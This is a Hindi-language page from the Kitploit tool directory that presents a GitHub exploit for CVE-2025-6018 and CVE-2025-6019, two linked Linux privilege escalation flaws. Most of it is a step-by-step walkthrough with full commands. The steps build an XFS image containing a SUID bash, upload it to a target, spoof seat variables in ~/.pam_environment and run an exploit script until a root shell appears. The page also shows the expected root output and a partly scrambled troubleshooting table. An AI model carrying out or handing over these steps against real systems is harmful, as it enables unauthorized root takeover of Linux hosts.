Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit | Kitploit
उपकरण/GitHubGitHub/ioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगबाइनरी शोषण
GitHubioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
5 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-6018 + CVE-2025-6019 विशेषाधिकार वृद्धि गाइड

📋 त्वरित शोषण चरण

चरण 1: XFS इमेज तैयार करें (स्थानीय मशीन)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

चरण 2: फ़ाइलें लक्ष्य पर अपलोड करें

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

चरण 3: पहला लॉगिन - PAM कॉन्फ़िगर करें

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 महत्वपूर्ण: लॉगआउट करें (PAM कॉन्फ़िग सक्रिय करने के लिए)
exit

चरण 4: दूसरा लॉगिन - विशेषाधिकार वृद्धि निष्पादित करें

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ सफलता संकेतक

यदि शोषण सफल होता है, तो आपको यह देखना चाहिए:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 समस्या निवारण

समस्यासमाधान
CanReboot लौटाता है

📌 मुख्य बिंदु

  • ✅ लॉगआउट और पुनः लॉगिन अनिवार्य है: PAM कॉन्फ़िग केवल नए सत्रों में प्रभावी होता है
  • ✅ CanReboot सत्यापित करें: स्क्रिप्ट चलाने से पहले पुष्टि करें कि यह ('yes',) लौटाता है
  • ✅ SSH लॉगिन का उपयोग करें: ssh -t user@host "cmd" शैली का निष्पादन उपयोग न करें

🐱 बिल्ली संरक्षक

यदि यह विफल होता है, तो सुनिश्चित करें कि हर चरण सख्ती से क्रम में निष्पादित किया गया है!

टूल डाउनलोड करें
('no',)
सुनिश्चित करें कि आपने लॉगआउट करके वापस लॉगिन किया है (चरण 3)
Not authorized त्रुटिजाँचें कि ~/.pam_environment की सामग्री सही है
SUID bash नहीं मिलाxfs.image को फिर से अपलोड करें और सत्यापित करें कि SUID बिट सेट है